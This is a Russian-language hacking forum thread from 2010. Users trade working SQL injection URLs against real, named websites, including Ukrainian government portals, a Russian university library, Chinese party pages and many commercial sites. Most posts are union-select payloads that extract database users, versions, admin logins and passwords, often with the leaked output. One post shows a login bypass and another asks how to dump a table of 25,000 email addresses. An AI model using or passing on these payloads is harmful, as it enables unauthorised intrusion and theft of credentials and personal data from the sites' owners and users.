12.01.2010, 22:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29,@@version_compile_os%29,3, 4,5,6,7,8
Код:
polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+Administrtion
http://libserv.tspu.edu.ru/documentation/shou_dokument.php?id=-6+union+select+1,2,3,group_concat%28concat_ws%280x 40,login,password%29%20separator%200x3a%29,5,6,7,8 +FROM+tspu1.administrtion
админки :
http://www.tspu.edu.ru/?ur=243&ur1=649
http://libserv.tspu.edu.ru/index1.php?ur1=93&ur=58
#2
http://construct.edu.ru/news.php?id=-62+union+select+1,2,3,4,5,concat_ws%280x3a,user%28 %29,version%28%29,database%28%29,@@version_compile _os%29,7,8--+
construct@localhost:5.1.39-log:construct  ortbld-freebsd7.2
Последний раз редактировалось Strilo4ka; 12.01.2010 в 23:06..
|
|
|
13.01.2010, 15:52
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
http://www.tspu.edu.ru/?ur=243&ur1=649
тут еще кстате скл в авторизации 
login: 'or+5=5/*
password: asdf
http://www.bla-bla-bla.ru/man/?id=-6+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4--
user_blablablaru@localhost:bla-bla-bla_ru:5.0.77
http://www.a1tv.ru/afisha/?city=135293+and+substring(version(),1,1)=5
сообщял им о скуле но никто незакрыл 
|
|
|
|
14.01.2010, 15:34
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
С нами:
8611638
Репутация:
10
|
|
Вот маг..
http://www.in2art.com/product_popup.php?prodID=-10486+union+select+1,2,3,group_concat(column_name, 0x3C62723E+SEPARATOR+0x0b),5,6,7,8,9,10,11,12,13,1 4+FROM+information_schema.columns+WHERE+table_sche ma=0x3435303739385F696E32617274+AND+table_name=0x6 D656D62657273--
Знатоки, подскажите, как выдрать целиком колонку, например, email.. там 25к адресов...
пишите в личку плз... |
|
|
|
19.01.2010, 01:53
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Коммунистическая партия Китая. Организация департамента Dashiqiao
http://www.dsqzzb. gov.cn/kxfz/news.php?sid=-23+union+select+1,version()--+
У кого там зуб на Украину? :P.. у меня нет.. ) Там щас выборы в Украине..Потому..
Официйний сайт Державного департамента з усиновлення та захисту прав дитини Міністерства України у справах сім'ї, молоді та спорту
http://www.ditu. gov.ua/en/decrees/-2177+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,10,11, 12,13,14,15,16+from+mysql.user--+
user() - root@localhost
version() - 5.0.51b-community-nt-log
database() - depdeti
file_priv = Y
/phpmyadmin/ присутствует
/admin/ тоже
Чернігівська облдержадміністрація
http://cg. gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+fro m+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,user||chr%2858%29||passwd+from+co m.users+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green _menu
http://cg.gov.ua/static_list.php?menu_id=1&NameTable=static_list&Ty peCod=&DEPAT=29+and+1=cast%28%28SELECT+current_use r||chr%2858%29||current_database%28%29||chr%2858%2 9||version%28%29%29+as+int%29--&pm=blue_menu
http://sosadm.cg. gov.ua/single_page.php?menu_id=-5+and+1=cast%28%28SELECT+current_user||chr%2858%29 ||current_database%28%29||chr%2858%29||version%28% 29%29+as+int%29--&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_ menu
user - www
database - portal
version - PostgreSQL 8.3.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.2.4
Как я понял, все поддомены там под одним юзвером и двигом. Получается добавим список уязвимых (под)сайтов.
bobradm.cg. gov.ua
borzadm.cg. gov.ua
chernrda.cg. gov.ua
goradm.cg. gov.ua
ichadm.cg. gov.ua
koradm.cg. gov.ua
kpadm.cg. gov.ua
kuladm.cg. gov.ua
meadm.cg. gov.ua
neadm.cg. gov.ua
nosadm.cg. gov.ua
novgadm.cg. gov.ua
oda.cg. gov.ua
pladm.cg. gov.ua
rpadm.cg. gov.ua
schorsadm.cg. gov.ua
semadm.cg. gov.ua
sribadm.cg. gov.ua
taladm.cg. gov.ua
varadm.cg. gov.ua
не кисло
Система розкриття інформації на фондовому ринку України. Агентство по развитию инфраструктуры фондового рынка Украины
http://www.smida. gov.ua/emitents/zvit_menu.php?id=4746+and+substring(version(),1,1) =4&forma=PERSON_Z&zvit_type=zat414&kod=32979387
http://old.smida.gov.ua/news/sv_1.php?id_news=-8077+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),version(),database()),9,10,11,12,13,14
Disallow: /adminzone/
phpinfo.php на месте
user() - dbu@localhost
version() - 4.1.20-log
database() - smida
ВИЩА КВАЛІФІКАЦІЙНА КОМІСІЯ АДВОКАТУРИ при Кабінеті Міністрів України
http://www.vkka. gov.ua/index.php?page=katalog&id=-41+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17--+
version() - 5.1.30-log
user() - vkka_root@localhost
database() - vkka_adv
все выводиться на ура
админка присутствует.
Последний раз редактировалось v1d0qz; 19.01.2010 в 01:58..
|
|
|
|
14.01.2010, 16:32
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
С нами:
8611638
Репутация:
10
|
|
Истчо Маг
http://www.musicpalace.ru/?go=katalog&catid=82&podcatid=403&prodid=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,group_concat%28table_name,0x3A+SEPARATOR+0x0b%2 9,34,35+FROM+information_schema.tables+WHERE+table _schema=0x623333373437--
|
|
|
|
15.01.2010, 00:17
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Код:
http://www.euphonium.net/discography.php?cdID=-37+union+select+1,2,3,4,5,6,7,8+from+guestbook+--+
Код:
http://www.brettbaker.co.uk/main.php?s_id=Soloist&id=93&group=&video_id=-4+union+select+1,2,table_name,4,5,6+from+information_schema.tables+--+
Код:
http://www.6degreesfilm.com/reviews.php?id=-811'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+2,1+--+
Код:
http://www.geardownload.com/reviews.php?id=-55399+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FroM+members+/*+
Код:
http://www.truemetal.it/reviews.php?op=albumreview&id=-8529+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+--+
Код:
http://www.verletzte-helfer.de/reviews.php?op=printpage&artid=-70+union+select+username,password+from+user+limit+1,1+--+
Код:
http://www.welsh8ball.com/reviews.php?op=PrintReview&id=-4+union+select+1,2,3,4,5,6,7,8,9+--+
Код:
http://membres.multimania.fr/nomad3d/reviews.php?op=PrintReview&id=-1+union+select+1,concat_ws(0x3a3a,aid,pwd),3,4,5,6,7,8,9+from+mpn_authors+--+
Код:
http://www.macupdate.com/reviews.php?id=12331&pid=-121925+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,perms),11,12,13,14,15,16,17,18,19,20,21+from+admins+--+
Код:
http://qclub.uk-pool.com/reviews.php?op=PrintReview&id=-1+union+select+1,2,concat_ws(0x3a3a,aid,pwd),4,5,6,7,8,9+from+mpn_authors+--+
Код:
http://www.matheplanet.com/default3.html?call=reviews.php?op=showcontent&id=-455+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+authors+--+&ref=http%3A%2F%2Fwww.google.ru%
Код:
http://www.synfulpleasures.com/reviews.php?op=showcontent&id=-119+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11+from+user+limit+1,1+--+
Код:
http://gehnaindia.com/catalogue.php?CID=2&SCID=-2+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6+from+sitemanager+--+
Код:
http://www.psiconline.it/reviews.php?op=showcontent&id=-25+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwdion+select+1,2,email,4,password+from+admin+--+
Код:
http://www.hcandersen-paraden.dk/paraden.php?id=2&contentid=-6'+union+select+concat_ws(0x3a3a,id,brugernavn,kodeord)+from+loginadmin+--+
Код:
http://www.hypernova.dk/index.php?setpage=nyheder&setnewsid=-291'+union+select+1,2,3,4,5,6,7,8+--+
Код:
http://www.ksknet.dk/side/content.php?sektion=Holdene&id=-474'+union+select+1,2,3+from+users+--+
Код:
http://www.caddealer.com/computingsecurity/reviews.php?id=-36+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10+frOm+infOrmation_schema.tAbles+/*+
Код:
http://ffejournal.com/articles.php?book=-FFE+%238'+union+select+1,2,3,4,5,6,7,8,9+--+
Код:
http://biosilkeborg.dk/show-content.php?id=-1+union+select+1,concat_ws(0x3a3a,userID,username,password,AdministratorRights),3,4+from+users+where+AdministratorRights=1+--+
Код:
http://www.kirosydfyn.dk/dynamisk/spg_og_svar/16_spg.php?id=-34+union+select+1,2,3,4,5,6+--+
Код:
http://www.substral.se/?page=products&type=products_outdoor&id=-4'+union+select+1,2,3,4,5+from+information_schema.tables+--+&menu=1
Код:
http://scae.dk/index2.php?menuid=25&parent=-23+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
Код:
http://www.soulportal.dk/reviews.php?op=showcontent&id=-701+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11+from+authors+limit+4,1+--+
Код:
http://talkislam.org/ptiming/link_body.php?linkId=-12+union+select+1,2,usr_password+from+tbluser+--+
|
|
|
|
17.01.2010, 01:50
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами:
9427499
Репутация:
22
|
|
http://www.go-sochi.ru/objinfo.php?prodId=28+UNION+SELECT+1,CONCAT_WS(0x3 a,Version(),Database(),User()),3,4+LIMIT+1,1--+
Database Version: 5.0.32-Debian_7etch11-log
Database name: mnemonic_gosochi
User name: mnemonic_gosochi@77.221.130.9
|
|
|
|
17.01.2010, 13:29
|
|
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами:
9427499
Репутация:
22
|
|
http://www.newemotion.it/en/mobile_phone.php?ProdID=494+UNION+SELECT+1,2,3--
Database Version: 5.0.67-community
Database name: admin_new_emotion
User name: admin_alexandros@localhost
|
|
|
|
17.01.2010, 22:06
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
С нами:
8611638
Репутация:
10
|
|
http://www.supportsolutions.co.za/job.php?job_id=-433+union+select+1,database(),3,4,5,6,7,8,9,10,11, 12,13,14,15,16--
|
|
|
|
17.01.2010, 22:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
http://www.traindisaster.ru/database.php?id=-1+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29,@@version_compile_os%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42--+
5.0.67-log:u169104:u169104@10.10.153.197:unknown-freebsd6.3
http://rulada.ru/viewcross.php?cid=-70+union+select+1,2,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29,@@version_compile_os%29 ,4,5,6,7,8,9,10--+
5.0.32-Debian_7etch11-log:z86577_db:z86577_db@77.221.130.19 c-linux-gnu
http://www.no-brand.ru/cloth/cloth.php?cid=282+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12--+
http://www.berus.ru/catalog.php?cid=-26+union+select+1,version%28%29,3,4,5,6,7--+
http://spbrabota.org.ru/podvak.php?i_d=-146+union+select+1,version%28%29,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23--+
http://ladydark.ru/page_02.php?uin=-60+union+select+1,2,version%28%29,4,5,6,7,8,9--+
Последний раз редактировалось Strilo4ka; 18.01.2010 в 00:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
